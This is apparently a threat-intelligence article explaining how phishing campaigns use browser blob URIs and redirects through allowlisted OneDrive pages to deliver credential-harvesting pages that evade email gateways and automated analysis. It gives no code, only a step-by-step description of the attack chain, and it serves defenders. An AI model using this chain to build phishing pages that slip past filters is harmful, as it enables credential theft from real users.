Using Blob URLs to Bypass SEGs and Evade Analysis

May 7, 2025

By: Jacob Malimban, Intelligence Team

Starting in mid-2022, Cofense Intelligence detected a new technique for successfully delivering a credential phishing page to a user’s inbox: blob URIs (Uniform Resource Identifier). Blob URIs are generated by a browser to display and work with temporary data that only that browser can access. No other browser can access a blob URI except the one that generated it. For example, YouTube uses blob URIs to temporarily store videos for a user’s browser.

Blob URIs have many legitimate uses for websites. Unfortunately, threat actors have also found blob URIs useful. Because the data is local to a client browser, blob URIs cannot be directly accessed over the internet like usual websites. Unlike most malicious sites, the final credential phishing page is inaccessible because the blob URI used to visit it is generated locally. Since phishing via blob URIs is still a relatively uncommon tactic, AI models may not have learned how to distinguish between legitimate and malicious blob URIs. All these factors can make automatic analysis difficult. Combining an unusual technique with many redirects is a typical tactic threat actors use to bypass SEG defenses.

Key Points

  • Like other phishing techniques, blob URIs have legitimate uses, such as serving videos on YouTube, but can be abused to serve malicious content.
  • Blob URIs can be identified when the address bar starts with “blob:http://” or “blob:https://”.
  • The usage of blob URIs is expected to increase if it continues to bypass Secure Email Gateway (SEG) security.
  • Blob URIs reference local browser memory instead of a network location. They cannot be directly accessed over the internet, which can make it hard to automatically analyze them, leading to SEG and defender bypass.

What are Blob URIs?

Blobs, or binary large objects, can be used by a browser to work with temporary data. Typical blobs include binary data like pictures, audio, and PDF files. Blobs can be accessed using blob URIs. For example, blob URIs allow YouTube to serve videos without giving users direct access to the video file. Instead of anyone being able to access https://www.youtube.com/video.mp4, the video URL is obfuscated and then stored in a local blob accessible only to the user who generated it, at blob[:]hxxps[:]//www[.]youtube[.]com/a76c7f9e-ed99-4a6c-38e32-6bb8583a025.

Blobs allow for benefits like access control and reduced network traffic. Access control means only authorized users can view the video file, because the direct network video link is hidden. There is reduced network traffic for YouTube to process because the video can be stored locally in browser memory temporarily. Unfortunately, threat actors have found a way to use blob URIs in their attacks. Instead of containing legitimate binary data, blobs used by attackers contain credential phishing HTML pages, which are decoded and rendered locally.

Attack Flowchart

There appear to be multiple campaigns using blob URIs for credential phishing. Campaign lures for logging in include receiving an encrypted message, accessing your Intuit tax account, and reviewing an alert from a financial institution.

In general, campaigns using blob URI for credential phishing follow this process:

  1. A credential phishing email bypasses a SEG and is successfully delivered to an end-user.
  2. The email contains a link to an intermediary, allowlisted page.
  3. The allowlisted page (like onedrive[.]live[.]com) is abused by the threat actor to redirect to a malicious site. The allowlisted page contains a link to a threat actor-controlled HTML page.
  4. The HTML page crafted by the threat actor decodes another HTML file to blob format that is then stored locally.
  5. The blob URI is a credential phishing page.
  6. Although the blob URI is accessible only locally, it contains functionality to exfiltrate credentials over the network to another threat actor endpoint.

Using-Blob-URLs-to-Bypass-SEGs-and-Evade-Analysis_Figure1-(1).PNG

Figure 1: Infection chain of a Blob URI phishing attack

Blob URI Content

Using-Blob-URLs-to-Bypass-SEGs-and-Evade-Analysis_Figure2.PNG

Figure 2: Intermediary site before redirecting to the phishing site is onedrive[.]live[.]com, a legitimate Microsoft cloud location

After clicking on a phishing link, the victim usually lands on an allowlisted page. This means the phishing email will not be immediately blocked for containing links that go directly to a phishing page. In this campaign, the intermediary allowlisted page is Microsoft’s cloud storage, onedrive[.]live[.]com. A victim would have trouble identifying red flags, as the website is the real Microsoft page without any spoofing. No spoofing or fake subdomains were used in this step. The page claims a message was encrypted by Microsoft, so a Microsoft login is justified. However, in this case, clicking on “Sign in” redirects to a threat-actor-controlled HTML page. After successfully redirecting to the threat actor’s website, an HTML blob URI is downloaded and displayed.

Using-Blob-URLs-to-Bypass-SEGs-and-Evade-Analysis_Figure3.PNG

Figure 3: A blob URI page spoofing a OneDrive login

After automatically loading the blob URI, the credential phishing page is shown in Figure 4. Like all blob URIs, this phishing page is only accessible to the browser that generated it. In this instance, threat actors spoofed a OneDrive login. Entering credentials into any of the options will exfiltrate the email address and password information to the threat actors